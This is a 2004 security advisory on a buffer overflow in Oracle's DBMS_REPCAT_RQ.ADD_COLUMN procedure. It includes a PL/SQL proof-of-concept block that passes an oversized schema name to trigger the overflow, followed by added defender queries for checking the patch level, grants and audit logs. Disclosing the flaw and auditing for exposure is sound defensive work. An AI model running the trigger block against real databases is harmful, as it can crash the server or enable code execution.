Application Security, Inc.

Team SHATTER Security Alert

#37 - Buffer overflow in procedure ADD_COLUMN of DBMS_REPCAT_RQ package

August 31, 2004

Credit: This vulnerability was researched and discovered by Esteban Martínez Fayó of Application Security, Inc.

Risk level: Low

Details:
When the ADD_COLUMN procedure is called with a long string in the SCHEMA_NAME parameter, a buffer overflow occurs.

To reproduce the overflow, execute the following PL/SQL block:

DECLARE
  P_SCHEMA_NAME       VARCHAR2(32767);
  P_OBJECT_NAME       VARCHAR2(32767);
  P_COLUMN_NAME       VARCHAR2(32767);
  P_DDL_TEXT          CLOB;            -- left NULL; not needed to trigger the overflow
  P_COLUMN_GROUP_NAME VARCHAR2(32767);
  P_NEW_GROUP         VARCHAR2(32767);
  P_RETRY             BOOLEAN;
  AAA                 VARCHAR2(32767);
BEGIN
  -- Build a 16384-character string: start with 'A' and double it 14 times (2^14).
  AAA := 'A';
  AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
  AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
  AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
  -- The oversized SCHEMA_NAME is the parameter that overflows.
  P_SCHEMA_NAME       := AAA;
  P_OBJECT_NAME       := 'Y';
  P_COLUMN_NAME       := 'Y';
  P_COLUMN_GROUP_NAME := 'Y';
  P_NEW_GROUP         := 'Y';
  P_RETRY             := FALSE;
  SYS.DBMS_REPCAT_RQ.ADD_COLUMN(
    SCHEMA_NAME       => P_SCHEMA_NAME,
    OBJECT_NAME       => P_OBJECT_NAME,
    COLUMN_NAME       => P_COLUMN_NAME,
    DDL_TEXT          => P_DDL_TEXT,
    COLUMN_GROUP_NAME => P_COLUMN_GROUP_NAME,
    NEW_GROUP         => P_NEW_GROUP,
    RETRY             => P_RETRY);
END;
/

Analysis:
This vulnerability can be exploited by members of the SYSDBA role and by any user granted EXECUTE permission on the DBMS_REPCAT_RQ package.
Successful exploitation allows an attacker to execute arbitrary code in the context of the database server. It can also be exploited to cause a denial of service (DoS) by killing the Oracle server process.

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). Oracle 10g is not vulnerable.
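The Analysis and Vendor Fix sections above tell a DBA what to verify: whether the instance is still below 9.2.0.5, and who can actually reach SYS.DBMS_REPCAT_RQ. The following SQL is an added defender-side check and is not part of the original advisory or of any Oracle-supplied script. It assumes an Oracle 9.2.x instance, a session with SELECT on the DBA_* data dictionary views (for example a DBA-role account), and, for the audit step, the audit_trail initialization parameter set to DB. It does not assume that any particular grant (such as one to PUBLIC) exists; step 2 reveals what is granted on your instance.

```sql
-- Added example: locate exposure to the DBMS_REPCAT_RQ.ADD_COLUMN overflow.
-- Assumes Oracle 9.2.x and a session with access to the DBA_* views.

-- 1. Is the instance below the fixed level (9.2.0.5)?
SELECT banner
  FROM v$version
 WHERE banner LIKE 'Oracle%';

-- 2. Direct grants: every grantee listed here (users, roles, or PUBLIC)
--    can call SYS.DBMS_REPCAT_RQ.ADD_COLUMN with an arbitrary SCHEMA_NAME.
SELECT grantee, privilege, grantable
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'DBMS_REPCAT_RQ'
 ORDER BY grantee;

-- 3. Indirect grants: accounts that receive EXECUTE through a role.
--    (Expands one level of role nesting; repeat for nested roles if needed.)
SELECT rp.grantee AS user_or_role, tp.grantee AS via_role
  FROM dba_tab_privs tp
  JOIN dba_role_privs rp ON rp.granted_role = tp.grantee
 WHERE tp.owner = 'SYS'
   AND tp.table_name = 'DBMS_REPCAT_RQ'
   AND tp.privilege = 'EXECUTE'
 ORDER BY rp.grantee;

-- 4. Interim mitigation until 9.2.0.5 is applied, on instances that do not use
--    replication: remove any grant to PUBLIC that step 2 reported.
--    Uncomment only after confirming the grant exists and replication is unused.
-- REVOKE EXECUTE ON SYS.DBMS_REPCAT_RQ FROM PUBLIC;

-- 5. Detection: record every call to the package, then review the audit trail.
AUDIT EXECUTE ON SYS.DBMS_REPCAT_RQ BY ACCESS;

SELECT username, os_username, userhost, timestamp, action_name, returncode
  FROM dba_audit_trail
 WHERE owner = 'SYS'
   AND obj_name = 'DBMS_REPCAT_RQ'
 ORDER BY timestamp DESC;
```

Two caveats apply to the detection step. A call that crashes the server process may never be written to the audit trail, so pair the audit query with a review of the alert log for ORA-07445 (exception encountered) entries around the time in question. Also, an account with SYSDBA is outside the scope of these grant queries, because SYSDBA access to SYS packages is not expressed as an EXECUTE grant in DBA_TAB_PRIVS; the advisory lists SYSDBA holders as able to exploit the issue regardless of what steps 2 and 3 return.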